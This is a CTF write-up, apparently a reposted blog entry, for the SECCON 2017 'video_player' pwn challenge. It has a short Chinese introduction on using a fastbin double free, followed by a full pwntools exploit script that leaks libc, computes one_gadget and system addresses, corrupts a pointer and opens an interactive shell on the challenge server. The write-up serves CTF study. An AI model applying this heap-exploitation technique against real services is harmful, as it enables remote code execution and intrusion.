  • Seccon2017-pwn500-video_player

      感觉这个题目并不值500分,有些地方比较牵强,漏洞也比较明显,解题方法有多种,出题者把堆的布局随机化了,不过使用fastbin doublefree的话,可以完全忽视被打乱的堆

      1 from pwn import *
      2 #context.log_level='debug'
      3 #wah
def newaudioclip(r, bitrate, length, data, description):
    """Walk the service's menu to 'add clip' -> 'audio' and answer its prompts.

    Every argument is sent raw with ``send`` (no trailing newline), so the
    caller controls the exact bytes delivered for each field.
    """
    for choice in ('1', '2'):
        r.recvuntil('>>> ')
        r.sendline(choice)
    prompts = (
        ('Audio Bitrate : ', bitrate),
        ('Audio Length (seconds) : ', length),
        ('Audio Data : ', data),
        ('Add description : ', description),
    )
    for prompt, value in prompts:
        r.recvuntil(prompt)
        r.send(value)
     17 
def newvideoclip(r, rs, fps, num, data, description):
    """Walk the menu to 'add clip' -> 'video' and fill in its five fields.

    Values are delivered with ``send`` exactly as given; the caller is
    responsible for any packing (p32/p64) and terminators.
    """
    for choice in ('1', '1'):
        r.recvuntil('>>> ')
        r.sendline(choice)
    prompts = (
        ('Video Resolution : ', rs),
        ('FPS : ', fps),
        ('Number of Frames : ', num),
        ('Video Data : ', data),
        ('Add description : ', description),
    )
    for prompt, value in prompts:
        r.recvuntil(prompt)
        r.send(value)
     33 
def newmetadataclip(r, date, owner):
    """Walk the menu to 'add clip' -> 'metadata' and supply date and owner."""
    for choice in ('1', '4'):
        r.recvuntil('>>> ')
        r.sendline(choice)
    for prompt, value in (('Date of Creation : ', date), ('Owner of video : ', owner)):
        r.recvuntil(prompt)
        r.send(value)
     43 
     44 
def editvideoclip(r, inx, rs, fps, num, data, description):
    """Select menu option 2 (edit), pick clip *inx*, and rewrite its fields.

    Note the final prompt differs from the add path ('Edit description : ').
    """
    r.recvuntil('>>> ')
    r.sendline('2')
    r.recvuntil('Enter index : ')
    r.sendline(inx)
    prompts = (
        ('Video Resolution : ', rs),
        ('FPS : ', fps),
        ('Number of Frames : ', num),
        ('Video Data : ', data),
        ('Edit description : ', description),
    )
    for prompt, value in prompts:
        r.recvuntil(prompt)
        r.send(value)
     60 
def delclip(r, inx):
    """Select menu option 4 (delete) and hand over the clip index *inx*."""
    steps = (('>>> ', '4'), ('Enter index : ', inx))
    for prompt, answer in steps:
        r.recvuntil(prompt)
        r.sendline(answer)
     66 
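def _leak_masked_qword(r, inx):
    """Select 'play' for clip *inx* and decode the first 8 bytes it prints.

    The original code XORs every received byte with 0xcc before unpacking
    it as a little-endian 64-bit value; presumably the player masks its
    output that way (confirm against the binary). ``recvn`` is used instead
    of ``recv(8)`` because ``recv`` may return fewer than 8 bytes, which
    would make the byte-by-byte decode raise IndexError.

    The blog rendering had dropped the backslash in the 'Playing video...'
    delimiter, splitting the literal across two lines; it is restored here.
    """
    r.recvuntil('>>> ')
    r.sendline('3')
    r.recvuntil('Enter index : ')
    r.sendline(inx)
    r.recvuntil('Playing video...\n')
    masked = r.recvn(8)
    return u64(''.join(chr(ord(c) ^ 0xcc) for c in masked))


# Module-level results of the two leaks; pwnpwn() reads them after calling
# the functions below.
close = 0


def playvideoclip(r, inx):
    """Leak an 8-byte value via clip *inx* and store it in global ``close``."""
    global close
    close = _leak_masked_qword(r, inx)
    print('leaked close is %x' % close)


chunk = 0


def playvideoclip1(r, inx):
    """Leak an 8-byte value via clip *inx* and store it in global ``chunk``."""
    global chunk
    chunk = _leak_masked_qword(r, inx)
    print('leaked chunk is %x' % chunk)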
     96 
def playvideoclip2(r, inx):
    """Select 'play' for clip *inx* without reading anything back.

    Unlike playvideoclip/playvideoclip1 this does not consume or decode
    the service's output; the caller takes over the connection afterwards.
    """
    steps = (('>>> ', '3'), ('Enter index : ', inx))
    for prompt, answer in steps:
        r.recvuntil(prompt)
        r.sendline(answer)
    102     
# Target selection: the local stub is switched off (``if 0``), so the
# script talks to the SECCON 2017 challenge host as published in the writeup.
ip, port = ('127.0.0.1', 10001) if 0 else ('video_player.pwn.seccon.jp', 7777)
    109 
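def getpid():
    """Print the pid of a locally running ``video_player`` and wait for Enter.

    Exists so a debugger can be attached while the script is paused; when
    no such local process exists, ``pidof`` returns an empty list and the
    pause is the only effect.
    """
    import time
    exe = 'video_player'
    time.sleep(0.1)  # give a freshly spawned local process a moment to show up
    pid = pwnlib.util.proc.pidof(exe)
    # Parenthesized print, consistent with the other print calls in this file
    # (the original used the bare Python 2 statement form).
    print(pid)
    raw_input('go!')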
    117 
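def pwnpwn():
    """Run the writeup's interaction against ``ip``/``port`` end to end.

    Outline, as far as the script itself shows it: one audio clip and one
    video clip are created and both deleted; the next video clip (index 2)
    is then edited with a crafted data record and 'played' to obtain two
    8-byte values (``close`` and ``chunk``); a metadata clip carrying the
    ``one_gadget`` address is added, a last edit is made, and the
    connection is handed to the operator. The writeup attributes the reuse
    of freed memory to a fastbin double free; the object layout behind the
    constants below is not visible on this page.

    The blog rendering had stripped backslashes from the ``'\\x00'`` literals
    (they appeared as ``'x00'``); they are restored here. All offsets and
    addresses are specific to the challenge binary and its libc build and
    must not be expected to hold elsewhere.
    """
    r = remote(ip, port)
    r.recvuntil('What is your movie name?')
    getpid()  # pause so a debugger can be attached to a local instance
    r.send('\x00' * 0xff)
    newaudioclip(r, p16(30), p32(0x50), '\x00', '\x00')
    # 1
    newvideoclip(r, p64(0), p32(0), p32(0x30), '\x00', '\x00')
    editvideoclip(r, '1', p64(0), p32(0), p32(0x50), '\x00', '\x00')

    delclip(r, '0')
    delclip(r, '1')

    # 2
    newvideoclip(r, p64(0), p32(0), p32(0x50), '\x00', '\x00')

    # Crafted data record; the trailing pointer is what 'play' ends up
    # reading from (presumably a GOT slot, given the leak is named close —
    # confirm against the binary).
    data = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x00604028)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data, '\x00')
    playvideoclip(r, '2')

    # 3 — libc-build-specific offsets from the writeup.
    close_offset = 0xF78B0
    binsh_offset = 0x18CD17
    system_offset = 0x45390
    one_gadget_offset = 0xf1117
    libc_base = close - close_offset
    # binsh/system are computed for the alternative route the writeup
    # mentions; this path only uses one_gadget.
    binsh = libc_base + binsh_offset
    system = libc_base + system_offset
    one_gadget = libc_base + one_gadget_offset
    data1 = p64(0) * 2 + p64(one_gadget)
    newmetadataclip(r, data1, '\x00' * 0x1f)

    data2 = p64(0x00402968) + p64(0x0) + p32(0x0) + p32(0x50) + p64(0x0000000000604400 + 3 * 8)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data2, '\x00')
    playvideoclip1(r, '2')

    raw_input('here')  # second pause point for inspecting the process
    data3 = p64(chunk)
    editvideoclip(r, '2', p64(0), p32(0), p32(0x50), data3, 'b' * 0x2f)
    playvideoclip2(r, '2')
    r.interactive()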
    159 
pwnpwn()  # runs at import time as well as when executed directly (no __main__ guard)

  • 原文地址:https://www.cnblogs.com/wangaohui/p/8022538.html